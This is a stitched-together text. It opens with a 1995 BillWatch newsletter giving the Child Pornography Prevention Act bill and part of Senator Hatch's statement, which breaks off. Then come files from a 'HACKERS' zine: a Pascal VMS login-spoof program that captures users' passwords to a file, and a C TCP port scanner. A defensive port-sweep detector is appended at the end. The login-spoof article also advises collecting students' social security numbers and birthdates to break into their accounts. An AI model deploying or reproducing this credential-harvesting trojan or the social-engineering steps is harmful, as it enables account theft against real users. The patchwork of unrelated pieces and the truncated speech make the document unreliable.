VTW will have a homepage on this bill soon. We've included both the text of the bill and Congressional debate on it below. To amend certain provisions of law relating to child pornography, and for other purposes. IN THE SENATE OF THE UNITED STATES September 13 (legislative day, September 5), 1995 Mr. Hatch (for himself, Mr. Abraham, Mr. Grassley, and Mr. Thurmond) introduced the following bill; which was read twice and referred to the Committee on the Judiciary A BILL To amend certain provisions of law relating to child pornography, and for other purposes. Be it enacted by the Senate and House of Representatives of the United States of America in Congress assembled, SECTION 1. SHORT TITLE. This Act may be cited as the `Child Pornography Prevention Act of 1995'. SEC. 2. FINDINGS. Congress finds that-- (1) the use of children in the production of sexually explicit material, including photographs, films, videos, computer images, and other visual depictions, is a form of sexual abuse which can result in physical or psychological harm, or both, to the children involved; (2) child pornography permanently records the victim's abuse, and its continued existence causes the child victims of sexual abuse continuing harm by haunting those children in future years; (3) child pornography is often used as part of a method of seducing other children into sexual activity; a child who is reluctant to engage in sexual activity with an adult, or to pose for sexually explicit photographs, can sometimes be convinced by viewing depictions of other children `having fun' participating in such activity; (4) prohibiting the possession and viewing of child pornography encourages the possessors of such material to destroy them, thereby helping to protect the victims of child pornography and to eliminate the market for the sexually exploitative use of children; and (5) the elimination of child pornography and the protection of children from sexual exploitation provide a compelling governmental 
interest for prohibiting the production, distribution, possession, or viewing of child pornography. SEC. 3. DEFINITIONS. Section 2256 of title 18, United States Code, is amended-- (1) in paragraph (2)(E), by inserting before the semicolon the following: `, or the buttocks of any minor, or the breast of any female minor'; (2) in paragraph (5), by inserting before the semicolon the following: `, and data stored on computer disk or by electronic means which is capable of conversion into a visual image'; (3) in paragraph (6), by striking `and'; (4) in paragraph (7), by striking the period and inserting `; and'; and (5) by adding at the end the following new paragraph: `(8) `child pornography' means any visual depiction, including any photograph, film, video, picture, drawing, or computer or computer-generated image or picture, whether made or produced by electronic, mechanical, or other means, of sexually explicit conduct, where-- `(A) the production of such visual depiction involves the use of a minor engaging in sexually explicit conduct; `(B) such visual depiction is, or appears to be, of a minor engaging in sexually explicit conduct; or `(C) such visual depiction is advertised, promoted, presented, described, or distributed in such a manner that conveys the impression that the material is or contains a visual depiction of a minor engaging in sexually explicit conduct.'. SEC. 4. PROHIBITED ACTIVITIES RELATING TO MATERIAL CONSTITUTING OR CONTAINING CHILD PORNOGRAPHY. (a) In General: Section 2252 of title 18, United States Code, is amended to read as follows: `Sec. 2252. 
Certain activities relating to material constituting or containing child pornography `(a) Any person who-- `(1) knowingly mails, transports, or ships in interstate or foreign commerce by any means, including by computer, any child pornography; `(2) knowingly receives or distributes-- `(A) any child pornography that has been mailed, shipped, or transported in interstate or foreign commerce by any means, including by computer; or `(B) any material that contains child pornography that has been mailed, shipped, or transported in interstate or foreign commerce by any means, including by computer; `(3) knowingly reproduces any child pornography for distribution through the mails, or in interstate or foreign commerce by any means, including by computer; `(4) either-- `(A) in the maritime and territorial jurisdiction of the United States, or on any land or building owned by, leased to, or otherwise used by or under the control of the United States Government, or in the Indian country (as defined in section 1151), knowingly sells or possesses with the intent to sell any child pornography; or `(B) knowingly sells or possesses with the intent to sell any child pornography that has been mailed, shipped, or transported in interstate or foreign commerce by any means, including by computer, or that was produced using materials that have been mailed, shipped, or transported in interstate or foreign commerce by any means, including by computer; or `(5) either-- `(A) in the maritime and territorial jurisdiction of the United States, or on any land or building owned by, leased to, or otherwise used by or under the control of the United States Government, or in the Indian country (as defined in section 1151), knowingly possesses 3 or more books, magazines, periodicals, films, videotapes, computer disks, or any other material that contains any child pornography; or `(B) knowingly possesses 3 or more books, magazines, periodicals, films, videotapes, computer disks, or any other material 
that contains any child pornography that has been mailed, shipped, or transported in interstate or foreign commerce by any means, including by computer, shall be punished as provided in subsection (b). `(b)(1) Whoever violates, or attempts or conspires to violate, paragraphs (1), (2), (3), or (4) of subsection (a) shall be fined under this title or imprisoned not more than 10 years, or both, but, if such person has a prior conviction under this chapter or chapter 109A, such person shall be fined under this title and imprisoned for not less than 5 years nor more than 15 years. `(2) Whoever violates paragraph (5) of subsection (a) shall be fined under this title or imprisoned for not more than 5 years, or both.'. (b) Technical Amendment: The table of sections for chapter 110 of title 18, United States Code, is amended by amending the item relating to section 2252 to read as follows: `2252. Certain activities relating to material constituting or containing child pornography.'. SEC. 5. PRIVACY PROTECTION ACT AMENDMENTS. Section 101 of the Privacy Protection Act of 1980 (42 U.S.C. 2000aa) is amended-- (1) in subsection (a)(1), by inserting before the semicolon at the end the following: `, or if the offense involves the production, possession, receipt, mailing, sale, distribution, shipment, or transportation of child pornography, the sexual exploitation of children, or the sale or purchase of children under section 2251, 2251A, or 2252 of title 18, United States Code'; and (2) in subsection (b)(1), by inserting before the semicolon at the end the following: `, or if the offense involves the production, possession, receipt, mailing, sale, distribution, shipment, or transportation of child pornography, the sexual exploitation of children, or the sale or purchase of children under section 2251, 2251A, or 2252 of title 18, United States Code'. SEC. 6. SEVERABILITY. 
If any provision of this Act, an amendment made by this Act, or the application of such provision or amendment to any person or circumstance is held to be unconstitutional, the remainder of this Act, the amendments made by this Act, and the application of such to any other person or circumstance shall not be affected thereby. STATEMENTS OF INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate - September 13, 1995) THE CHILD PORNOGRAPHY PREVENTION ACT OF 1995 Mr. HATCH. Mr. President, it is impossible for any decent American not to be outraged by child pornography and the sexual exploitation of children. Such material is a plague upon our people and the moral fabric of this great Nation. And, as a great Nation, I believe that we have both the constitutional right and moral obligation to protect our children from those who, motivated by profit or perversion or both, would abuse, exploit, and degrade the weakest and most vulnerable members of our society. Current Federal law dealing with child pornography reflects the overwhelming bipartisan consensus which has always existed, both in Congress and in the country, that there is no place for such filth even in a free society and that those who produce or peddle this reprehensible material must be made to feel the full weight of the law and suffer a punishment reflective of the seriousness of their offense. As with many of our criminal statutes, however, effective enforcement of our laws against child pornography today faces a new obstacle: The criminal use, or misuse, of new technology which is outside the scope of existing statutes. In order to close this computer-generated loophole and to give our law enforcement authorities the tools they need to stem the increasing flow of high-tech child pornography, I am today introducing the Child Pornography Prevention Act of 1995. 
The necessity for prompt legislative action amending our existing Federal child pornography statutes to cover the use of computer technology in the production of such material was vividly illustrated by a recent story in the Washington Times. This story, dated July 23, 1995, reported the conviction in Canada of a child pornographer who copied innocuous pictures of children from books and catalogs onto a computer, altered the images to remove the childrens' clothing, and then arranged the children into sexual positions. According to Canadian police, these sexual scenes involved not only adults and children, but also animals. Even more shocking than the occurrence of this type of repulsive conduct is the fact that, under current Federal law, those pictures, depicting naked children involved in sex with other children, adults, and even animals, would not be prosecutable as child pornography. That is because current Federal child pornography and sexual exploitation of children laws, United States Code title 18, sections 2251, 2251A, and 2252, cover only visual depictions of children engaging in sexually explicit conduct whose production involved the use of a minor engaging in such conduct; materials such as photographs, films, and videotapes. Today, however, visual depictions of children engaging in any imaginable forms of sexual conduct can be produced entirely by computer, without using children, thereby placing such depictions outside the scope of Federal law. Computers can also be used to alter sexually explicit photographs, films, and videos in such a way as to make it virtually impossible for prosecutors to identify individuals, or to prove that the offending material was produced using children. The problem is simple: While Federal law has failed to keep pace with technology, the purveyors of child pornography have been right on line with it. This bill will help to correct that problem. 
The Child Pornography Prevention Act of 1995, which includes a statement of congressional findings as to harm, both to children and adults, resulting from child pornography, has three major provisions. First, it would amend United States Code title 18, section 2256, to establish, for the first time, a specific, comprehensive, Federal statutory definition of child pornography. Under this bill, any visual depiction, such as a photograph, film, videotape or computer image, which is produced by any means, including electronically by computer, of sexually explicit conduct will be classified as child pornography if: (a) its production involved the use of a minor engaging in sexually explicit conduct; or (b) it depicts, or appears to depict, a minor engaging in sexually explicit conduct; or (c) it is promoted or advertised as depicting a minor engaging in sexually explicit conduct. _________________________________________________________________ __________ SUBSCRIPTION AND REPRODUCTION INFORMATION *** Know of someone ANYWHERE with a fax machine but without net *** *** access that's interested in VTW's issues? Tell them to *** *** call and get on our weekly fax distribution list at *** *** (718) 596-2851 (or email us their fax number). *** To get on the distribution list for BillWatch, send mail to listproc@vtw.org with "subscribe vtw-announce Firstname Lastname" in the subject line. To unsubscribe from BillWatch (and all other VTW publications) send mail to listproc@vtw.org with "unsubscribe vtw-announce" in the subject line. 
Email vtw@vtw.org with "send billwatch" in the SUBJECT LINE to receive the latest version of BillWatch.

For permission to reproduce VTW alerts contact vtw@vtw.org
___________________________________________________________________________
End VTW BillWatch Issue #18, Date: Sun Sep 17 16:36:37 EDT 1995
___________________________________________________________________________

This file provided by:

    Voters Telecommunications Watch
    *** Watching out for your civil liberties ***

    Email:     vtw@vtw.org (preferred)
    Gopher:    gopher -p1/vtw gopher.panix.com
    URL:       http://www.vtw.org/
    Telephone: (718) 596-2851 (last resort)
===========================================================================

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #7 of 9

A VMS Login Spoof

By: Talonphish

-----------------------------------------------------------------------------

When I read last month's issue of HACKERS, I was excited to see the article about VAX hacking. One thing I noticed was that to use most, if not all, of the things spoken about in the article, you had to already have a privileged account. This left open one question: Just how does one go about getting a privileged account on a VAX system? That is where this article picks up.

It has been said that to completely secure a system you would need to shut it down and lock it up. In other words, not let anyone use it or even get near it. It has also been said that the weakest link in a secure system is the system users. This even holds true for VAX, which is almost considered a swear word by many because it is supposedly "unhackable". Not the case.

GETTING AN ACCOUNT.
-------------------------

The first thing a person needs to do in order to do anything with a VAX is obviously to get an account. It doesn't have to be a privileged account, any account will do. The best way to do this would be to perform a little Social Engineering. Shoulder surfing should do the trick.
If that is impossible, then just do something similar to what I did. At a certain college running VAX, all freshman students' passwords were their birthdate in the form 041975, until they changed them. All usernames for students were their first initial, last 6 digits of their social security number, and their last initial. Most freshman students are somewhat computer illiterate, and never change their passwords. Therefore, all you needed to do to get an account was to look at their driver's license, or conduct a little survey (not in the computer lab) asking students questions about major etc., and just dropping in a question of their soc. number and birthday.

The moral? Often a person doesn't need to look to holes, or other stupid bugs posted on the net that anyone can abuse, but to yourself and your own imagination to gain needed information.

ONCE YOU HAVE AN ACCOUNT.
----------------------------

Once you have an account, be it yours or someone else's, you want to gain privileges or at least an account that isn't yours to use. Assuming that your account is just a basic user account with no special priv's, you need to devise a plan to get a different account. Now you need to do a little research. Where do people with privileged accounts log in from? i.e. Professors. Once you know this, you can steal their accounts fairly easily with a little program. All you need to know is what the login screens look like.

Here is a VERY simple Pascal program that will write the username and password to a file called outfile.

!!!WARNING!!! This is not an amazing program, if you are going to use it, don't use it from your account! You should also add lines to the file login.com that will log out the account should anyone break out of the program and type things such as directory, show users, or anything else normally typed. You don't want people to know which account you are on.
I also changed the prompt so it said "ERROR, TURN OFF TERMINAL AND REEBOOT". You can do this by typing Set prompt:== "whatever" from the $ prompt.

begin program
----------------------------------------------------------------------------
program snag(input,output,outfile);
type
   str20= varying[20] of char;
var
   outfile:file;
   I:integer;
   cvax,username,password:str20;
begin
   rewrite outfile;
   write('Local> ');
   readln(cvax);
   {this simulates the login screen}
   writeln('Local -010- session 1 to VAX on node OMEGA established');
   writeln('Somewhere University of XX');
   writeln('Computing and Communications Center');
   writeln('Unauthorized Access Prohibited');   {ain't it the truth}
   write('Username: ');
   readln(username);
   write('Password: ');
   readln(password);
   write(outfile,username);
   write(outfile,password);
   writeln('ERROR x99503b, Please turn off terminal and reeboot');
   close outfile;
   for I=1 to 100 do
      readln;   {prevents person from hitting keys and going back to shell}
end.
--------------------------------------------------------------
end program..

Run in the right place at the right time and voilà, privileged access. Then use the things you learned in issue #2 of HACKERS and hack away.

*note* This program did not turn off echo from keyboard to screen for the input of password, this could be a dead giveaway. I suggest rewriting the code (in a better language). This is only an example.

In closing, no system will ever be secure and useful at the same time.

Talonphish

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #8 of 9

Remote Host Probing

By: IOERROR

The enclosed program, 100% my own code, will probe ports 1-1024 on the given host (call it as: % tcpprobe connected.com) and report on which hosts accept connections. It may require a little tweaking to work on some of the oddball Unixes like SunOS... I wrote it under Linux.

-----BEGIN-----cut here-----
/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main(int argc, char **argv)
{
  struct hostent *host;
  int err, i, net;
  struct sockaddr_in sa;

  if (argc != 2) {
    printf("Usage: %s hostname\n", argv[0]);
    exit(1);
  }

  /* ports 1-1024, as described in the text */
  for (i = 1; i <= 1024; i++) {
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    if (isdigit((unsigned char)*argv[1]))
      sa.sin_addr.s_addr = inet_addr(argv[1]);
    else if ((host = gethostbyname(argv[1])) != 0)
      /* memcpy, not strncpy: an address may contain zero bytes */
      memcpy(&sa.sin_addr, host->h_addr, sizeof sa.sin_addr);
    else {
      herror(argv[1]);
      exit(2);
    }
    sa.sin_port = htons(i);

    net = socket(AF_INET, SOCK_STREAM, 0);
    if (net < 0) {
      perror("\nsocket");
      exit(2);
    }

    /* a completed three-way handshake means something is listening */
    err = connect(net, (struct sockaddr *) &sa, sizeof sa);
    if (err < 0) {
      printf("%s %-5d %s\r", argv[1], i, strerror(errno));
      fflush(stdout);
    } else {
      printf("%s %-5d accepted. \n", argv[1], i);
      if (shutdown(net, 2) < 0) {
        perror("\nshutdown");
        exit(2);
      }
    }
    close(net);
  }
  printf(" \r");
  fflush(stdout);
  return (0);
}

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #9 of 9

The End

As I said in the intro, I've moved, so from now on direct all snail mail to Room #621A, Redwood Hall, 186 Bleeker St., Newark, NJ 07103. My new phone number is (201) 565-9145, and if you live in NYC, I'll see you at 2600, hopefully. As always, if you've got an article or two, send them over to scanlonr@delphi.com. We still have not had enough reader response, good or bad, to justify a letters column, so if you have anything to say about the mag, or have any questions about Hacking as a whole, send them on in.

So until next month, wherever you hack, may the ethic be with you....

* * * * * * * * * * * * * * * * * * * *
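
The connect() sweep that tcpprobe performs in the Remote Host Probing file leaves one connection record per port on the probed host, which is what the receiving side can look for. The following is an added example, not part of the original zine or IOERROR's code: it flags any source that touches many distinct low ports on one destination inside a short window. The log format, the addresses, the window and the threshold are all constructed assumptions.

```c
/* Added example: flag tcpprobe-style connect() sweeps in a connection log. */
#include <stdio.h>
#include <string.h>

#define MAX_PAIRS   32    /* tracked (source, destination) pairs */
#define MAX_PORT    1024  /* tcpprobe only walks the low port range */
#define WINDOW_SECS 60    /* window length, an assumed tuning value */
#define THRESHOLD   20    /* distinct ports per window before alerting, assumed */

struct pair_state {
    char src[32], dst[32];
    long window_start;
    int distinct;                       /* distinct low ports seen this window */
    int flagged;                        /* already reported */
    unsigned char seen[MAX_PORT + 1];
};

/* Find or create the slot for a (src, dst) pair; NULL when the table is full. */
static struct pair_state *lookup(struct pair_state *tab, int *len,
                                 const char *src, const char *dst, long ts)
{
    struct pair_state *p;
    for (int i = 0; i < *len; i++)
        if (!strcmp(tab[i].src, src) && !strcmp(tab[i].dst, dst))
            return &tab[i];
    if (*len == MAX_PAIRS)
        return NULL;
    p = &tab[(*len)++];
    memset(p, 0, sizeof *p);
    snprintf(p->src, sizeof p->src, "%s", src);
    snprintf(p->dst, sizeof p->dst, "%s", dst);
    p->window_start = ts;
    return p;
}

/*
 * Read lines of the constructed form
 *   "<epoch-seconds> <src> <dst> <dport> <ACCEPT|REFUSED>"
 * and store in out[] each source that touches THRESHOLD or more distinct low
 * ports on one destination inside one window. Returns the number stored.
 */
int detect_sweeps(const char **lines, int n, char out[][32], int max_out)
{
    static struct pair_state tab[MAX_PAIRS];
    int len = 0, hits = 0;

    for (int i = 0; i < n; i++) {
        long ts; int port; char src[32], dst[32], res[16];
        struct pair_state *p;
        if (sscanf(lines[i], "%ld %31s %31s %d %15s", &ts, src, dst, &port, res) != 5)
            continue;                   /* malformed line: skip it */
        if ((strcmp(res, "ACCEPT") && strcmp(res, "REFUSED")) ||
            port < 1 || port > MAX_PORT)
            continue;                   /* unknown result or port out of range */
        if (!(p = lookup(tab, &len, src, dst, ts)))
            continue;
        if (ts - p->window_start > WINDOW_SECS) {   /* start a new window */
            memset(p->seen, 0, sizeof p->seen);
            p->distinct = 0;
            p->window_start = ts;
        }
        if (!p->seen[port]) { p->seen[port] = 1; p->distinct++; }
        if (p->distinct >= THRESHOLD && !p->flagged && hits < max_out) {
            p->flagged = 1;
            snprintf(out[hits++], 32, "%s", src);
        }
    }
    return hits;
}

/* Constructed sample: one sequential sweep of ports 1..40 with `gap` seconds
 * between probes, repeated web traffic from another client, one bad line. */
int run_sample(int gap, char out[][32], int max_out)
{
    static char buf[64][80];
    const char *lines[64];
    int n = 0, i;
    for (int port = 1; port <= 40; port++)
        snprintf(buf[n++], sizeof buf[0], "%ld 192.0.2.10 198.51.100.5 %d %s",
                 811200000L + (long)gap * port, port, port == 25 ? "ACCEPT" : "REFUSED");
    for (int k = 0; k < 20; k++)
        snprintf(buf[n++], sizeof buf[0], "%ld 192.0.2.20 198.51.100.5 %d ACCEPT",
                 811200000L + k, k % 2 ? 80 : 443);
    snprintf(buf[n++], sizeof buf[0], "garbage line");
    for (i = 0; i < n; i++)
        lines[i] = buf[i];
    return detect_sweeps(lines, n, out, max_out);
}

int main(void)
{
    char out[4][32];
    int hits = run_sample(0, out, 4);
    for (int i = 0; i < hits; i++)
        printf("possible port sweep from %s\n", out[i]);
    return 0;
}
```

WINDOW_SECS and THRESHOLD are the tuning knobs: the window has to be long enough to cover the pace of the probes being watched for, and the threshold high enough that ordinary clients talking to a handful of services stay under it.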